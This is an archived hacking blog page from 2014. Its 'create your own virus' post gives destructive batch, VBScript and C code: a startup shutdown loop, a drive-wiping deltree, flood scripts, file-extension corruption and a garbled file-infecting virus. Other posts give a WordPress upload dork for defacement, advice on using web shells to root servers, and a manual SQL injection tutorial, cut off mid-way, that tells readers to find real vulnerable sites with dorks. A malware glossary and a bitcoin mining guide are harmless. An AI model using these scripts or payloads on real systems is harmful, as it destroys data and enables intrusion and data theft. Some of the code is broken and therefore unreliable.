Information Treasure: Hacking

Breaking News

Showing posts with label Hacking. Show all posts

Tuesday, November 18, 2014

Virus And Trojan Codes : Create Your Own

This Section contains the Virus Codes. Some of these codes are already familiar with you, But still very much harmful and educational too. Below mentioned some of the Platforms in which these virus are coded.

BATCH Programming.
C/C++
Python
Visual Basic.

The code here are used for Educational Purposes. Please don’t use them to harm others. You can also install any Virtual Machine on your system, to experiment those codes.

1. SHUTDOWN VIRUS

Many of you know this trick, but i can’t call this a virus. But still its not a friendly one, it can affect and harm uR data if not saved.

Effect –> May Harm uR workings and unsaved data.
Coding Platform –> Batch Programming.
Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.

Type the code or just paste the code in notepad and save it as “.bat” extension. Example –> ron.bat

**************************************************

@echo off

shutdown -s -t “30″

**************************************************

“30″ mentioned here is time in seconds in which your system will shut-down. You can set any time as uR requirements. You can also add comments by adding “-c” tag after “30″. To give any message to user while shutdown process.

Example –> shutdown -s -t “60″ -c “Windows Formatting starts…”

2. SHUTDOWN VIRUS {More Destructive}

This code is same as above but it restricts system to start and shuts down system each time it starts.

Effect –> Destructive and Irritating.
Coding platform –> Batch Programming.
Working –> Shuts down system each time it starts, and user are never able to login properly. If user boots up system again and again, it sometimes cause windows failure or data lost.

Just type or copy the code in notepad and save it as “.bat” extension.
**************************************************
@echo off
shutdown -s -t “00″
**************************************************

Now goto following location –> start –> all programs –> startup. Right Click and open folder. Now just copy that saved .bat file and paste in that startup folder.

CAUTION –> DON’T USE THIS ON YOUR SYSTEM, YOU WILL NEVER ABLE TO OPEN YOUR SYSTEM. ONLY WAY TO GET RID OF THIS VIRUS IS TO OPEN YOUR SYSTEM IN SAFE MODE AND JUST GOTO THAT STARTUP FOLDER AND DELETE THAT “.bat” FILE.

3. MULTIPLY FOLDER VIRUS

Effect –> Not Destructive, But sometimes can become very irritating and itchy.
Coding Platform –> Batch Programming.
Working –> This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.

Just write or copy the code in notepad and save it as “.bat” extension.
**************************************************
@echo off
:RON
md folder1
md folder2
md folder3
md folder4
md folder5
start folder1
start folder2
start folder3
start folder4
start folder5
goto RON
**************************************************

Now goto, START –> ALL PROGRAMS –> STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.

4. NOTEPAD FLOOD

Effect –> Not Destructive or harmless.
Coding Platform –> Batch Programming.
Working –> On executing this .bat file it will open and flood loads of notepad {actually it opens around 180 notepads}. This sometimes cause PC hang.

Type the code or just copy the code in notepad and save it as “.bat” extension.
**************************************************
@echo off
:RON
start notepad
start notepad
start notepad
goto RON
**************************************************

In the above code you can write “start notepad” any number to times. Increasing this command will increase flooding and cause higher chances of system hang-up.

5. DEADLY WORDPAD VIRUS

Effect –> Deadly and Destructive.
Coding Platform –> Batch Programming.
Working –> On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.

Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.

**************************************************

@echo off

deltree C:\

**************************************************

NOTE – PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS.

6. FILE EXTENSION CORRUPTING VIRUS

Effect –> Effects file execution, irritating but not destructive. Will Corrupt file working.
Coding Platform –> Batch Programming.
Working –> On executing this code will affects the opening of file and will corrupt the files extension. This will corrupt the file and disables it and you will not be able to execute it in proper format.

Just type or copy the code in notepad and save it as anyname with “.bat” extension.

*************************************************

@echo off

ren *.exe *.txt

ren *.jpeg *.txt

ren *.mp3 *.txt

ren *.doc *.com

ren *.jpg *.txt

**************************************************

7. DANCING CAPSLACK & NUMLOCK

Effect –> Low, Irritating for normal user.
Coding Platform –> VBscript
Working –> On executing it will toggle both, capslock and numkey continously and it becomes very irritating for normal user. This type of code can be used for prank purposes.

Just type the code or copy it on notepad and save it as anyname with “.vbs” extension. Example –> “ron.vbs”

**************************************************

Set wshShell =wscript.CreateObject(“WScript.Shell”)

wscript.sleep 100

wshshell.sendkeys “{CAPSLOCK}”

wshshell.sendkeys “{NUMLOCK}”

loop

**************************************************

8. NOTEPAD TSUNAMI VIRUS

Effect –> Harmful n Effective, Cause system crash easily.
Coding Platform –> VBscript.
Working –> On Executing, it opens notepad unlimited no. of times and write a text into notepad automatically. It looks very scary for normal users as it leads to system hang and crash system in few minutes.

Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.

**************************************************

Set wshShell =wscript.CreateObject(“WScript.Shell”)

WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200

Wshshell.Sendkeys “s”

Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”

WScript.Sleep 200

WshShell.SendKeys “You”

WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”

wscript.sleep 200

wshshell.sendkeys “{enter}”

wscript.sleep 200

wshshell.sendkeys “look”

wscript.sleep 200

wshshell.sendkeys “{enter}”

wscript.sleep 200

wshshell.sendkeys “how”

wscript.sleep 200

wshshell.sendkeys “{enter}”

wscript.sleep 100

wshshell.sendkeys “i”

wscript.sleep 200

wshshell.sendkeys “{enter}”

wscript.sleep 200

wshshell.sendkeys “crash”

wscript.sleep 200

wshshell.sendkeys ” uR”

wscript.sleep 200

wshshell.sendkeys “{enter}”

wscript.sleep 200

wshshell.sendkeys “system”

wscript.sleep 200

loop

**************************************************

9. POP-UP CD/DVD DRIVE VIRUS

Effect –> Low, but very irritating. Not Harmless.
Coding Platform –> VBscript.
Working –> On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.

Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.

**************************************************

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
< !--[if !supportLineBreakNewLine]-->

************************************************************

10. CLONE VIRUS

Effect –> Harmful and very effective.
Coding Platform –> C, Turbo C.
Working –> On Executing, this virus does is it makes all the files in the current directory a virus. Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.

***************************************************
FILE *Ron *vRon;
int owned = 0;
unsigned long x;
char buff[256];
struct ffblk ffblk;
clock_t st, end;
main()
{
st=clock();
clrscr();
owned=(find_first(“*.*”, &ffblk,0);
while(!done)
{
Ron=fopen(_arg[0], “rb”);
vhost=fopen(ffblk.ff_name, “rb+”);
if (vhost = =NULL)
goto next;
x = 89088;
printf(“infecting %s\n”, ffblk.ff_name);
while(x>2048)
{
fread(buff,256,1,Ron);
fwrite(buff,256,1,vRon);
x – = 2048;
}
fread(buff,x,1,Ron);
fwrite(buff,x,1,vRon);
a++;
next: fcloseall();
owned = findnext(&ffblk);
}
end = clock()
printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
return (0);
}

**************************************************

Monday, September 29, 2014

What Is the Difference: Viruses, Worms, Trojans and Bots?

Introduction

Viruses, worms, Trojans, and bots are all part of a class of software called malware. Malware or malicious code (malcode) is short for malicious software. It is code or software that is specifically designed to damage, disrupt, steal, or in general inflict some other “bad” or illegitimate action on data, hosts, or networks.
There are many different classes of malware that have varying ways of infecting systems and propagating themselves. Malware can infect systems by being bundled with other programs or attached as macros to files. Others are installed by exploiting a known vulnerability in an operating system (OS), network device, or other software, such as a hole in a browser that only requires users to visit a website to infect their computers. The vast majority, however, are installed by some action from a user, such as clicking an e-mail attachment or downloading a file from the Internet.
Some of the more commonly known types of malware are viruses, worms, Trojans, bots, back doors, spyware, and adware. Damage from malware varies from causing minor irritation (such as browser popup ads), to stealing confidential information or money, destroying data, and compromising and/or entirely disabling systems and networks.
Malware cannot damage the physical hardware of systems and network equipment, but it can damage the data and software residing on the equipment. Malware should also not be confused with defective software, which is intended for legitimate purposes but has errors or bugs.

Classes of Malicious Software

Two of the most common types of malware are viruses and worms. These types of programs are able to self-replicate and can spread copies of themselves, which might even be modified copies. To be classified as a virus or worm, malware must have the ability to propagate. The difference is that a worm operates more or less independently of other files, whereas a virus depends on a host program to spread itself. These and other classes of malicious software are described below.

Viruses

A computer virus is a type of malware that propagates by inserting a copy of itself into and becoming part of another program. It spreads from one computer to another, leaving infections as it travels. Viruses can range in severity from causing mildly annoying effects to damaging data or software and causing denial-of-service (DoS) conditions. Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program. When the host code is executed, the viral code is executed as well. Normally, the host program keeps functioning after it is infected by the virus. However, some viruses overwrite other programs with copies of themselves, which destroys the host program altogether. Viruses spread when the software or document they are attached to is transferred from one computer to another using the network, a disk, file sharing, or infected e-mail attachments.

Worms

Computer worms are similar to viruses in that they replicate functional copies of themselves and can cause the same type of damage. In contrast to viruses, which require the spreading of an infected host file, worms are standalone software and do not require a host program or human help to propagate. To spread, worms either exploit a vulnerability on the target system or use some kind of social engineering to trick users into executing them. A worm enters a computer through a vulnerability in the system and takes advantage of file-transport or information-transport features on the system, allowing it to travel unaided.

Trojans

A Trojan is another type of malware named after the wooden horse the Greeks used to infiltrate Troy. It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems. After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops) to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses). Trojans are also known to create back doors to give malicious users access to the system.
Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. Trojans must spread through user interaction such as opening an e-mail attachment or downloading and running a file from the Internet.

Bots

"Bot" is derived from the word "robot" and is an automated process that interacts with other network services. Bots often automate tasks and provide information or services that would otherwise be conducted by a human being. A typical use of bots is to gather information (such as web crawlers), or interact automatically with instant messaging (IM), Internet Relay Chat (IRC), or other web interfaces. They may also be used to interact dynamically with websites.
Bots can be used for either good or malicious intent. A malicious bot is self-propagating malware designed to infect a host and connect back to a central server or servers that act as a command and control (C&C) center for an entire network of compromised devices, or "botnet." With a botnet, attackers can launch broad-based, "remote-control," flood-type attacks against their target(s). In addition to the worm-like ability to self-propagate, bots can include the ability to log keystrokes, gather passwords, capture and analyze packets, gather financial information, launch DoS attacks, relay spam, and open back doors on the infected host. Bots have all the advantages of worms, but are generally much more versatile in their infection vector, and are often modified within hours of publication of a new exploit. They have been known to exploit back doors opened by worms and viruses, which allows them to access networks that have good perimeter control. Bots rarely announce their presence with high scan rates, which damage network infrastructure; instead they infect networks in a way that escapes immediate notice.

Best Practices for Combating Viruses, Worms, Trojans and Bots

The first steps to protecting your computer are to ensure that your OS is up to date. This means regularly applying the most recent patches and fixes recommended by the OS vendor. Secondly, you should have antivirus software installed on your system and download updates frequently to ensure that your software has the latest fixes for new viruses, worms, Trojans, and bots. Additionally, you want to make sure that your antivirus program can scan e-mail and files as they are downloaded from the Internet. This will help prevent malicious programs from reaching your computer. You may also want to consider installing a firewall.

Additional Definitions and References

Exploit

An exploit is a piece of software, a command, or a methodology that attacks a particular security vulnerability. Exploits are not always malicious in intent—they are sometimes used only as a way of demonstrating that a vulnerability exists. However, they are a common component of malware.

Back Door

A back door is an undocumented way of accessing a system, bypassing the normal authentication mechanisms. Some back doors are placed in the software by the original programmer and others are placed on systems through a system compromise, such as a virus or worm. Usually, attackers use back doors for easier and continued access to a system after it has been compromised.

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

In WordPress we can upload our deface page using Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps to hack the wordpress website.

1. Open google and search inurl:Editor/assetmanager/assetmanager.asp
2. Now open any result you will found look like bellow snapshot.
3. Just click on browse and upload your deface page.

What is SHELL and How to use it ?

After getting the admin access in the website attacker uploads his own control panel that’s called shell. It helps attacker to maintain access for the long time. There are many types of shells like DDOSE shell, symlink shell etc.

Using shell attacker can destroy whole database and he can leak the database of the website and using the shell he can root the server. (Only Linux server can be rooted; windows server can't be rooted because there is no ROOT). After rooting he can destroy whole server. Suppose One server contains 500 websites and attacker got the admin access in the single site and he have rooted that server then 500 sites can be destroyed !

USES OF SHELL

1. Using shell you can Destroy the INDEX page of the website
2. You can host your files in the server.
3. You can root the server

Now if you want to destroy the index page of the website then find the “INDEX” page from the list and replace that coding with your own deface page. And using browse option you can host your own file in the server. You can create your own shell and you can add your own tools in your shell. for that you know PHP.

Tuesday, September 23, 2014

How to become Professional Hacker

I'm not Professional Hacker but not Noob also, I'm also learner like you all. I am posting this article for those people who want to be Hacker in little time without hard work.

Seven things you must know to become Hacker

Right Definition & Meaning of Hacker.
You must have Hacker Attitude & Confidence.
Programming & Networking, (The Main thing beginner must know).
Learn Networking, Linux, Start use Backtrack/Linux.
Start using Linux, leave Windows. (I use Kali Linux)
Create Penetration testing lab and try to Hack it.
Never Give-up in Hacking - (Always remember there is always a way).
Stop Requesting Hackers to teach Hacking or "Hack for me".

Right Definition & Meaning of Hacker

You know, beginners, lamers and noobs think to Hack facebook account, they just learn Phishing, key-logging, Sniffing and some small tricks & techniques to steal passwords- But seriously that isn't a Hacking, That's a stealing method. Let's learn the real meaning of Hacker.

Hacker : A hacker is the one who search for vulnerabilities & flaws (weakness point of Web-Application or Software) and exploit it with different techniques and hack it or report it. There are only five purpose of hackers : Learn, Earn, Protest, Publicity, & Challenge. Simply hacker is awesome.

You must have an Hacker Attitude & Confidence
Hacker must have an attitude to break anything with their knowledge, talent & Experience. I saw that many people's says - I'll learn all Programming languages to become Hacker, but the fact is they give up and start believing, I don't need to learn Programming I can hack directly via exploits and small techniques!, but it's simply impossible. Even I too accept learning programming is not easy, but it ain't hard also. You must have confidence and an attitude to do something at any how condition, think like hacker - try to know how stuffs work ? think different from all, Be quite and Simply awesome guy with an attitude of ability to do something. Believe in what you see, feel and be the tech lover, just Program and Keep Calm - Never GIVE UP. Try to learn all types of Computer Technology start with Basic and go step by step! Feel like hacker, Make contacts with hackers and crackers.
Stop Requesting Hackers to teach Hacking, this is very bad method learners use to talk with hackers, then only hackers understand that you're lamer and noob - After that he doesn't like to talk with you.

Learn by yourself or Join Hacking Institutes :

CEH : Certified Ethical Hacker.
CHFI : Computer Hacking Forensics Investigation.
CCNA : Cisco Certified Networking Associate.
CISSP : Certified Information System Security Professional.
CCSN : Certified Cyber Security Ninja.

Learn Programming
The main problem of all learners, beginners is that they don't want to learn Programming - it's hard but if you once stepped never look back and always remember that "Beginning part is always Hard!", Nothing is impossible. Go step-by-step in Programming field, Don't start with Hard parts.
Hacking is possible only when you're good in Programming. If you're champ in programming and Networking then Hacking is like a Piece of Cake for you, yeah it will take little long time, but it's really worthy. Programming is the solution of all problems that learners faces in hacking, coding and learning. Programming is the source, base and the main point of Computer Application or Web Application.

Questions which are always be asked by noobs to other hackers:
1) Can I learn Hacking without Knowing Programming ?
2) How can I learn Programming ?
3) What Should I learn to become Hacker ?

Can I learn Hacking without Knowing Programming ?
Simply you can't. if you don't know Programming then you can't Hack anything, Yeah you can learn simple tricks, and some basic attacks only. But if you want to become Professional Hacker or Security Researcher then you'll have to become Champ in Programming and Networking. Guys Programming isn't too much hard just we need to concentrate and practice, practice & practice. If you'll understand Programming and Coding of Web-App, and Software then you'll simply understand weakness point of the App, You'll get to know how it works and you can Create, Explore, Hack, Learn and Earn.

Programming language is the base of Hacking, without Programming no one can learn Hacking, I mean Professional & Best Hacking methods like Vulnerability Hunting, Exploitation, Reverse Engineering, SQLi, XSS & Advance XSS methods etc.

How can I learn Programming ?
There are many ways to learn Programming languages, if you are passionate in Hacking & Programming and you are Computer geek! then you can do it by yourself only : Yeah! you can use Google, E-books, Some Websites that teach us online Programming languages, or you can also learn in Group friends or Join Classes.
What Should I learn to become Hacker ?

Well, this is our main Point of tutorial - So what should I learn ? First of all be passionate about Programming & Hacking. Trust in yourself & Have Patience.

There are two fields in Hacking :

1. Web-Application Hacking

2. Software Cracking/Hacking

So, first of all make sure in which field you want to become best. If you'll ask me then I'll prefer you First Web Application Hacking & Programming, web Programming isn't too much Hard, you'll be able to understand Software Programming languages. Below is the Step by Step Languages Guide and Compulsory Programming languages for Hackers.

Web Application Hacking & Programming

As you know that, Web Application are coded in different languages and methods using Advance Programming techniques and Codes, and if you'll learn all types of Web Programming and Coding then you'll be able to Hack it & find weakness point of Web App.

Important Programming languages for Hackers

HTML, JavaScript, & CSS (DHTML)
PHP/ASP & SQL (Most Recommended - Server Side Scripting)
Ajax, jQuery, & JSON - (Must know little bit)
XML, DHTML.
Networking - (TCP/IP, HTTP, SMPT, etc) Most recommended.
Moving to advance stuffs like - (Python, C, Perl, and Ruby)

HTML is one of the famous and all time useful Web Programming languages, to develop website and contents it is strongly recommended you to learn HTML. Static and Dynamic generators. JavaScript and CSS is also useful for hackers to discover XSS flaws and Bypassing techniques.

PHP/ASP is strongly recommended you to learn because it is server side scripting languages. It's Dynamic Web-Apps Programming language. Now SQL, As you know that SQL Injection the technique of Injection attacks into DB, that can leak website sensitive data and also lead to Defacement. XML is also recommende to learn - Data transmission, SOAP technology etc.

AJAX, jQuery and JSON are lightweight fat client - programming languages, it's not highly recommended but you must know it's 50%.

Now Networking is also one of the mostly recommended thing you must learn. because without knowing it's flow, method, logic and Encoding/Decoding you won't understand how everything is going on. so the most important things you must know is - TCP/IP, SSL, HTTP, SMPT, Proxies and Other Protocols.

Unfortunately even i've not moved to advance stuffs like Python, Perl - Writing exploits, so no experience or knowledge. I'm still on programming, but i'll definitely post in future about Advance Scripting and writing Exploits.

Software Cracking/Hacking & Programming

Now Software Cracking, Hacking & Programming is also very useful in Computer Hacking & Cracking Field. #Reverse Engineering, #Network, Adatpter, Wifi Cracking & Hacking, #Software Cracking #Virus #Trojan #Malware and etc methods used to hack , #Software and #Secret Service Information.

What you must know ?

C Programmming
C++
Python
UNIX/Linux
VB & .Net
Assembly Language (Most Important for Cracking & Hacking)

- Without Learning Programming & Networking you cannot Hack anything.

Source: Hackw0rm

Thursday, July 31, 2014

Mine Bitcoins with Raspberry Pi

Jump on the cryptocurrency bandwagon and mine some of your own Bitcoins – or other currency – with a spare Raspberry Pi

The concept of cryptocurrencies has come about in recent years as a sort of reaction to the way standard currencies are controlled. Cryptocurrenices such as Bitcoin are decentralised and not controlled by any one entity. In the past couple of years, Bitcoin has taken off to become a very valuable commodity, with whole Bitcoins becoming worth hundreds of pounds. While you can trade your standard currency for a Bitcoin, you can also mine them with a working computer.

The concept of mining basically means that you’re increasing the security of the Bitcoin system by logging transactions properly; users who donate processing power to this endeavour get paid for it in Bitcoins. This is where we come in, turning your Raspberry Pi into a Bitcoin mine.

Create your own Raspberry Pi Bitcoin miner

What you’ll need

Cpuminer
Bitcoin pool

Step-by-step

Step 01 Install dependencies

In this tutorial we’re going to be using cpuminer to mine for Bitcoins; this needs to be compiled from source though, so we have to install some dependencies first to make sure it works. Do this with:

$ sudo apt-get install gcc gcc-4.5 g++ g++-4.5 libstdc++6-4.5-dev libpcre3-dev libcurl3-dev make less

Step 02 Download locations

In order to make the building we’ll be doing soon a little bit easier, it’s best to create a directory for our files now. Still in the terminal, use:

mkdir bitcoind

After you’ve done that, move to the new directory with

cd bitcoind

Step 03 Get cpuminer

Visit the SourceForge link for cpuminer and download the latest version of the source from there to this new directory. It will be the latest version with no OS attached to the title. At the time of writing this is pooler-cpuminer-2.3.3.tar.gz.

Step 04 Extract the files

If you’re in the desktop you can easily extract the files from the file manager. Otherwise go back to the terminal you’ve been working in and unpack it with:

$ tar -zxvf cpuminer-1.0.2.tar.gz

Follow up by moving into the new cpuminer folder with cd.

Step 05 Build cpuminer

To build cpuminer we’ll be using two very standard compiling commands: ./configure and make. Both may take a while, with the make command likely to take the longest time. If you’ve followed the preceding steps properly, compiling should not be an issue for you.

Step 06 Join a pool

Mining solo is generally considered a futile effort if you want to actually make Bitcoin out of the process. Joining a pool is the best way to do this and be involved with the community at the same time. Sign up to get a username, password and URL.

Step 07 Start mining

With your worker details secure, go back to your Raspberry Pi and cd to the cpuminer folder again. To begin with cpu mining, enter the following command:

$ ./minerd --url [pool address] --userpass [username]:[password]

Cpuminer will then show your hashrate as it goes, which will probably be a touch slow at this stage.

Step 08 Increase mining speed

If you want to try and get a few more hashes per second from your Pi, you can always overclock it. In the terminal, open raspi-config and find the overclock option. You can increase it to whatever speed you wish but be aware that overclocking may seriously reduce your Pi’s lifespan.

Step 09 Future prospects

You’re unlikely to make much out of a Raspberry Pi this way; if you want to make a serious amount of Bitcoins you’ll need to increase your hashrate. You can expand your operation by attaching USB Bitcoin miners to the Raspberry Pi and powering it up exponentially.

Thursday, July 24, 2014

Hacking Websites Using SQL Injection Manually

Sql Injection - Hacking Websites

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.

SQL Injection

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.

A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google's "inurl" command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:"products.php?prodID="

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it's search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

Now lets assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an asterisk ' at the end of the url instead of 25. The url would look somewhat like this www.site.com/products.php?prodID='

If you are lucky, then the site would be vulnerable. If it is, then there would a some kind of error showing up, which would have the words like "Not found","Table","Database","Row","Column","Sql","MysqL" or anything related to a database. In some cases, there would be no error, but there would be some berserk/ unexpected behavior on the page, like a few components not showing up properly, etc.

A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows

Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.

www.site.com/products.php?prodID=25+order+by+1

Effectively, we added order by 1 to the end of the original url. If there is atleast one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Lets assume you get an error for

www.site.com/products.php?prodID=25+order+by+6

This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things

The site is vulnerable to SQL injection

It has 5 columns

Now you need to know which of the columns is vulnerable

Finding Vulnerable columns

Now lets assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. We now need to find which of the columns is vulnerable. To do this, enter the following into the url

www.site.com/products.php?prodID=25+union+select+1,2,3,4,5

In some cases you might need to put a - behind the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.

Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.

Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.

Unification

From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. The website is

http://testphp.vulnweb.com/

The actual vulnerability is here

http://testphp.vulnweb.com/listproducts.php?cat=1

Notice that the URL has the structure that you now know well. If used properly, a google dork could have led us to this site as well. Now we will replace the 1 with an asterisk '

This is what you vulnerable page looks like to start with

As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.

12 columns. Error....

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute -

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

Now we can see total four numbers on the page. 11,7,2 and 9. It won't be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it's more about logic and creativity than it's about learning up useless code.
Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you'll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we're gonna look at first.

In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables. The final url will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

We now have the names of all the tables. Here it is - CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,
EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,
REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,
TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

It is similar to obtaining tables, other than the fact that we will use informaiton_schema.columns instead of informaiton_schema.tables, and get multiple columns instead of just one using the same group concat. We will also have to specify which table to use in hex. We will use the table events (I've highlighted it above too). In hex it's code is 4556454e5453 (You can use text to hex convertor - also prefix 0x behind the code before entering it). The final code will be-

